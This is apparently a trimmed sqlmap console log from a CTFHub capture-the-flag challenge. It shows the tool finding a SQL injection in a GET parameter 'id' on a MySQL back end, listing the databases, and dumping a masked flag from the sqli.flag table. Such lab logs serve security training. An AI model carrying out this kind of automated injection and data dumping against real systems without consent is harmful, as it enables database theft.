[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:54:00 /2023-02-10/
......
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
......
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
......
available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] sqli
[08:54:35] [INFO] fetched data logged to text files under '/home/xenonwzh/.local/share/sqlmap/output/challenge-XXX.sandbox.ctfhub.com'
Database: sqli Table: flag [1 column] +--------+--------------+ | Column | Type | +--------+--------------+ | flag | varchar(100) | +--------+--------------+
[08:59:35] [INFO] fetching columns for table 'flag' in database 'sqli' [08:59:35] [INFO] fetching entries for table 'flag' in database 'sqli' Database: sqli Table: flag [1 entry] +----------------------------------+ | flag | +----------------------------------+ | ctfhub{XXXXXX} | +----------------------------------+
[08:59:35] [INFO] table 'sqli.flag' dumped to CSV file '/home/xenonwzh/.local/share/sqlmap/output/challenge-c35f0537e0f328ea.sandbox.ctfhub.com/dump/sqli/flag.csv' [08:59:35] [INFO] fetched data logged to text files under '/home/xenonwzh/.local/share/sqlmap/output/challenge-c35f0537e0f328ea.sandbox.ctfhub.com'